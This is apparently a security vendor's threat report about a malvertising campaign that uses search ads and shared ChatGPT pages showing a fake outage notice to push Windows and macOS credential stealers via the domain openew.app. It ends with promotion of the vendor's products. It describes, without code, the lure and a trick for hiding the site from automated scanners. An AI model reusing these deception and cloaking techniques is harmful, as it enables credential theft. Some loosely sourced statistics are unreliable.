A new campaign discovered recently, shows how attackers abuse ChatGPT’s sharing feature and search ads to spread malware. By bidding on search terms like “ChatGPT,” they push malicious ads that link to a shared ChatGPT page on chatgpt.com. Instead of a chat, this page displays a convincing “high traffic” outage message instructing users to download a desktop app.
Unaware of the ruse, victims click through and are led to a fake download portal that installs malware. The result is a stealthy delivery of credential stealers and data harvesters through a trusted domain. The following sections break down each step of this scheme and its broader implications.
Attack Chain: From Google Ads to Malware
The hackers exploit Google Ads to advertise a site that pretends to be the official ChatGPT website. As an example, a sponsored link for “ChatGPT” takes the victim to a malicious shared page rather than to the actual ChatGPT service. Clicking on the ad takes the visitor to the chatgpt.com/s/… URL hosted by the fraudster.
- Malicious Ad: Hackers pay for keywords associated with ChatGPT to have their ads show up higher in search results. These ads pretend to direct the victim to the actual ChatGPT site.
- Fake Outage Page: The shared URL at chatgpt.com opens a page informing the user of an outage due to “high traffic.” In addition, the victim is urged to install a desktop app (more on that below).
- Redirect to Download: Clicking on the “Download” button redirects the victim to openew.app another malicious ChatGPT clone.
- Hidden Malware: At
openew.app, the victim finds a number of installation options (Mac and Windows) that silently infect the computer with malicious code (credentials stealer/info-stealer).
Google ad and chatgpt.com make the setup appear legitimate, while the final downloads deliver the malicious software.
Fake ChatGPT Outage Notice Tricks Victims
As soon as the users find the ChatGPT webpage for their discussion, they will notice the well-constructed message about the current situation. It says, “We’re experiencing high traffic right now… our website is temporarily unavailable due to a large number of users. Download our desktop app to continue”. The design of the page follows the branding standards of ChatGPT and also includes links like “Show code / Remix with ChatGPT”, suggesting the users that the page is written by a user in HTML.
In actual practice, most of the time, people will only come across the regular chat page containing the same message, thus, making it official in its look. The message contains an urgent term of high traffic that makes the user download the application without second thoughts.
Impersonated ChatGPT Download Site Delivers Malware
When the user clicks on the download button, the user is redirected to the openew.app website. This website is designed similar to the official ChatGPT website and contains an OpenAI logo with a description and links for downloading both macOS and Windows versions. Because openew.app is an officially managed Google “.app” website, which uses HTTPS protocol, it displays a padlock icon in all browsers.
Unfortunately for users, both downloads contain malicious software. There is a very sneaky way how the site is cloaked from automated scanners such as URLScan. When visiting openew.app using a bot, the site redirects the scanner to a seemingly legitimate website that describes an AR/VR company. Meanwhile, normal users are seeing the site with a fake ChatGPT and malicious download links. The website contains two downloadable items:
- Windows Installer: This link starts a hidden PowerShell session, which downloads and executes the malware. After analyzing the script used in this process, security experts found out that this tool allows executing PowerShell processes with unrestricted policy and then downloading a credential stealer.
- macOS Installer: It leads to the downloading of a disk image called Odyssey Stealer, which is actually a version of the infamous AMOS malware. It stealthily gathers cookies, login credentials and crypto wallets data from the infected computers.
By splitting targets by operating system, the attackers maximize impact. In tests, both installers attempted to install malware payloads rather than any legitimate ChatGPT app.
Why Trusted AI Platforms Are Easy Targets
However, its success depends heavily on how much people can trust the platform being used. Links provided by ChatGPT and the openew.app website look like trustworthy sites for users and their security software. The payload is stored on the websites chatgpt.com and claude.ai which users trust. Based on the reputation of these domains, they are deemed benign, so no security filters can detect the fake web page. Moreover, even if people check the address bar, they will notice that “chatgpt.com” looks trustworthy.
Nevertheless, such an approach corresponds with modern trends in malware distribution. More than 60% of attacks were delivered via online ads in 2025. As such, programmatic ads and search results are now major channels of attack delivery. Using ChatGPT’s sharing system, cybercriminals make use of a trusted website.
Examples of Similar AI-Powered Scams
This is not an isolated case. Hackers have frequently attacked AI chat websites as well as reliable websites. As per reports in early 2026, attackers made use of Google Ads and redirected users to a shared Claude.ai chat asking users to download certain files which included malware installation instructions in the form of command-line instructions which users were directed to copy-paste to their systems.
Over 700 sites were taken control of through a CMS vulnerability and were made to redirect visitors to malware command-line installations through a supposed verification step. Other attacks made use of ChatGPT and Grok website sharing to mislead users about malware command-line instructions masqueraded as guides to installing software.
Security teams and computer users should be aware of the fact that criminals may exploit trust placed in websites such as AI generators, cloud computing websites, etc., to launch malware campaigns. Malware attacks will continue until hackers find no other avenue left. The fact that AI is being targeted here should not surprise anyone.
Conclusion: When Trusted AI Links Become Malware Delivery
This campaign shows how attackers are turning trusted AI platforms into malware launchpads. The victim does not start on a suspicious domain. They click a search ad, land on a real ChatGPT share link, see a convincing outage message, then follow a fake download path that delivers credential stealers and macOS malware.
The attack succeeds because trust is borrowed from platforms users already believe are safe.
Why This Threat Works So Well
AI sharing links, search ads, and polished fake download pages create a dangerous chain of deception:
- Sponsored search results push malicious links above legitimate ones
- ChatGPT share pages make the lure appear trusted
- Fake outage messages create urgency and reduce skepticism
- Cloaked download sites evade automated scanners
- Windows and macOS payloads maximize impact across users
- Credential stealers target cookies, logins, wallets, and browser data
Once the user follows the trusted path, the attacker controls the outcome.
Where Xcitium Changes the Outcome
For organizations using Xcitium’s layered security approach, this attack would be disrupted at multiple stages.
Xcitium Cyber Awareness Education helps users recognize the warning signs of AI-themed scams, malicious search advertisements, fake outage notifications, and deceptive download pages before they interact with them.
Xcitium Phishing Simulation enables organizations to continuously test and reinforce user resilience against evolving social engineering tactics, helping security teams identify high-risk users and improve awareness before real attacks occur.
If a user still proceeds with the download, Xcitium Advanced EDR provides the final line of defense:
- Unknown installers are isolated the moment they execute
- Hidden PowerShell chains cannot freely launch malware
- macOS stealer payloads cannot access real user data
- Code can run without being able to cause damage
- Credential theft, persistence, and data harvesting are stopped before impact
Even when attackers abuse trusted AI platforms and legitimate-looking content, users are better prepared to recognize the deception, and any malicious payload that reaches the endpoint is prevented from causing harm.
Stop Malware Where Trust Is Abused
Attackers now weaponize search engines, AI sharing platforms, and familiar user experiences to make malicious downloads appear legitimate. Effective defense requires both user education and execution-level protection.
With Xcitium Cyber Awareness Training, Phishing Simulation, and Advanced EDR, organizations can reduce of users falling for these attacks while ensuring that malicious payloads remain isolated.
